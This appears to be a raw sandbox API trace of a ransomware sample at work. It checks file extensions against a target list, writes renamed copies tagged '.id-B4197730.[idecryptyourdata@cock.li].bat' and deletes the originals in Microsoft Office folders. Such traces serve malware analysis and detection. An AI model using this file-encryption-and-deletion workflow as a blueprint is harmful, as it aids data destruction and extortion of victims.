lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.838] lstrlenW (lpString=".7z") returned 3 [0201.838] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 68 [0201.838] lstrlenW (lpString=".dbf") returned 4 [0201.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 68 [0201.838] lstrlenW (lpString=".1cd") returned 4 [0201.838] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 68 [0201.839] lstrlenW (lpString=".jpg") returned 4 [0201.839] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.839] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.839] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0201.840] GetLastError () returned 0x0 [0201.840] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1066, lpOverlapped=0x0) returned 1 [0201.917] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1070, lpOverlapped=0x0) returned 1 [0201.918] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.918] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0201.918] SetEndOfFile (hFile=0x374) returned 1 [0202.185] CloseHandle (hObject=0x374) returned 1 [0202.185] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.186] SetEndOfFile (hFile=0x3a0) returned 1 [0202.186] CloseHandle (hObject=0x3a0) returned 1 [0202.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0202.187] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf")) returned 1 [0202.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 68 [0202.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 68 [0202.188] lstrlenW (lpString=".doc") returned 4 [0202.188] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0202.188] lstrlenW (lpString=".docx") returned 5 [0202.188] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0202.188] lstrlenW (lpString=".pdf") returned 4 [0202.188] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0202.188] lstrlenW (lpString=".xls") returned 4 [0202.188] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0202.188] lstrlenW (lpString=".xlsx") returned 5 [0202.188] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0202.188] lstrlenW (lpString=".ppt") returned 4 [0202.188] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0202.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 68 [0202.188] lstrlenW (lpString=".zip") returned 4 [0202.188] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.188] lstrlenW (lpString=".rar") returned 4 [0202.188] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.188] lstrlenW (lpString=".bz2") returned 4 [0202.188] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0202.188] lstrlenW (lpString=".7z") returned 3 [0202.188] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0202.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 68 [0202.189] lstrlenW (lpString=".dbf") returned 4 [0202.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 68 [0202.189] lstrlenW (lpString=".1cd") returned 4 [0202.189] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0202.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF") returned 68 [0202.189] lstrlenW (lpString=".jpg") returned 4 [0202.189] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0202.189] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.189] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0202.194] GetLastError () returned 0x0 [0202.194] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x380a, lpOverlapped=0x0) returned 1 [0202.244] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x3810, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x3810, lpOverlapped=0x0) returned 1 [0202.246] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0202.246] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0202.246] SetEndOfFile (hFile=0x374) returned 1 [0202.246] CloseHandle (hObject=0x374) returned 1 [0202.247] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.247] SetEndOfFile (hFile=0x3a0) returned 1 [0202.247] CloseHandle (hObject=0x3a0) returned 1 [0202.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0202.248] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf")) returned 1 [0202.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 68 [0202.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 68 [0202.249] lstrlenW (lpString=".doc") returned 4 [0202.249] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0202.249] lstrlenW (lpString=".docx") returned 5 [0202.249] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0202.249] lstrlenW (lpString=".pdf") returned 4 [0202.249] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0202.249] lstrlenW (lpString=".xls") returned 4 [0202.249] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0202.249] lstrlenW (lpString=".xlsx") returned 5 [0202.249] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0202.250] lstrlenW (lpString=".ppt") returned 4 [0202.250] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0202.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 68 [0202.250] lstrlenW (lpString=".zip") returned 4 [0202.250] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.250] lstrlenW (lpString=".rar") returned 4 [0202.250] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.250] lstrlenW (lpString=".bz2") returned 4 [0202.250] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0202.250] lstrlenW (lpString=".7z") returned 3 [0202.250] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0202.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 68 [0202.250] lstrlenW (lpString=".dbf") returned 4 [0202.250] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 68 [0202.250] lstrlenW (lpString=".1cd") returned 4 [0202.250] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0202.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF") returned 68 [0202.250] lstrlenW (lpString=".jpg") returned 4 [0202.250] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0202.250] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.251] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0202.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0202.251] GetLastError () returned 0x0 [0202.251] ReadFile (hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0) Thread: id = 91 os_tid = 0x964 [0178.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x75dc40 [0178.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3c10048 [0178.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de0a8 [0178.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c3b0 [0178.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de0c0 [0178.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x3d12020 [0178.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6dde80 [0178.035] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6dde80, Size=0x20) returned 0x6beea8 [0178.035] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddeb0 [0178.035] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddeb0, Size=0x20) returned 0x6bef48 [0178.036] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.036] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.036] Wow64DisableWow64FsRedirection (in: OldValue=0x311ff50 | out: OldValue=0x311ff50*=0x0) returned 1 [0178.036] lstrlenW (lpString="kernel32.dll") returned 12 [0178.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.036] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.036] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.036] Sleep (dwMilliseconds=0x64) [0178.267] Sleep (dwMilliseconds=0x64) [0178.499] Sleep (dwMilliseconds=0x64) [0179.039] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.039] lstrlenW (lpString="ipsnor.xml") returned 10 [0179.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.040] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=2580) returned 1 [0179.040] CloseHandle (hObject=0x340) returned 1 [0179.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml")) returned 0x20 [0179.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.040] lstrlenW (lpString=".doc") returned 4 [0179.040] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.040] lstrlenW (lpString=".docx") returned 5 [0179.040] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0179.040] lstrlenW (lpString=".pdf") returned 4 [0179.040] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString=".xls") returned 4 [0179.041] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString=".xlsx") returned 5 [0179.041] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0179.041] lstrlenW (lpString=".ppt") returned 4 [0179.041] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.041] lstrlenW (lpString=".zip") returned 4 [0179.041] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.041] lstrlenW (lpString=".rar") returned 4 [0179.041] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString=".bz2") returned 4 [0179.041] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString=".7z") returned 3 [0179.041] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.041] lstrlenW (lpString=".dbf") returned 4 [0179.041] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.041] lstrlenW (lpString=".1cd") returned 4 [0179.041] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.041] lstrlenW (lpString=".jpg") returned 4 [0179.041] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.041] lstrlenW (lpString=".doc") returned 4 [0179.042] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString=".docx") returned 5 [0179.042] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0179.042] lstrlenW (lpString=".pdf") returned 4 [0179.042] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString=".xls") returned 4 [0179.042] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString=".xlsx") returned 5 [0179.042] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0179.042] lstrlenW (lpString=".ppt") returned 4 [0179.042] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.042] lstrlenW (lpString=".zip") returned 4 [0179.042] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.042] lstrlenW (lpString=".rar") returned 4 [0179.042] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString=".bz2") returned 4 [0179.042] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString=".7z") returned 3 [0179.042] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.042] lstrlenW (lpString=".dbf") returned 4 [0179.042] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.042] lstrlenW (lpString=".1cd") returned 4 [0179.042] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 61 [0179.042] lstrlenW (lpString=".jpg") returned 4 [0179.042] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.043] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.043] lstrlenW (lpString="ipsplk.xml") returned 10 [0179.043] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.043] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=2600) returned 1 [0179.043] CloseHandle (hObject=0x340) returned 1 [0179.043] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0x20 [0179.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.044] lstrlenW (lpString=".doc") returned 4 [0179.044] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.044] lstrlenW (lpString=".docx") returned 5 [0179.044] lstrcmpiW (lpString1=".docx", lpString2="k.xml") returned -1 [0179.044] lstrlenW (lpString=".pdf") returned 4 [0179.044] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.044] lstrlenW (lpString=".xls") returned 4 [0179.044] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.044] lstrlenW (lpString=".xlsx") returned 5 [0179.044] lstrcmpiW (lpString1=".xlsx", lpString2="k.xml") returned -1 [0179.044] lstrlenW (lpString=".ppt") returned 4 [0179.044] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.044] lstrlenW (lpString=".zip") returned 4 [0179.044] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.044] lstrlenW (lpString=".rar") returned 4 [0179.044] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.044] lstrlenW (lpString=".bz2") returned 4 [0179.044] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.044] lstrlenW (lpString=".7z") returned 3 [0179.045] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.045] lstrlenW (lpString=".dbf") returned 4 [0179.045] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.045] lstrlenW (lpString=".1cd") returned 4 [0179.045] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.045] lstrlenW (lpString=".jpg") returned 4 [0179.045] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.045] lstrlenW (lpString=".doc") returned 4 [0179.045] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.045] lstrlenW (lpString=".docx") returned 5 [0179.045] lstrcmpiW (lpString1=".docx", lpString2="k.xml") returned -1 [0179.045] lstrlenW (lpString=".pdf") returned 4 [0179.045] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.045] lstrlenW (lpString=".xls") returned 4 [0179.045] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.045] lstrlenW (lpString=".xlsx") returned 5 [0179.045] lstrcmpiW (lpString1=".xlsx", lpString2="k.xml") returned -1 [0179.045] lstrlenW (lpString=".ppt") returned 4 [0179.045] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.045] lstrlenW (lpString=".zip") returned 4 [0179.045] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.046] lstrlenW (lpString=".rar") returned 4 [0179.046] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.046] lstrlenW (lpString=".bz2") returned 4 [0179.046] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.046] lstrlenW (lpString=".7z") returned 3 [0179.046] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.046] lstrlenW (lpString=".dbf") returned 4 [0179.046] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.046] lstrlenW (lpString=".1cd") returned 4 [0179.046] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 61 [0179.046] lstrlenW (lpString=".jpg") returned 4 [0179.046] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.046] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.046] lstrlenW (lpString="ipsptb.xml") returned 10 [0179.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.047] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=2246) returned 1 [0179.047] CloseHandle (hObject=0x340) returned 1 [0179.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0x20 [0179.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.047] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.047] lstrlenW (lpString=".doc") 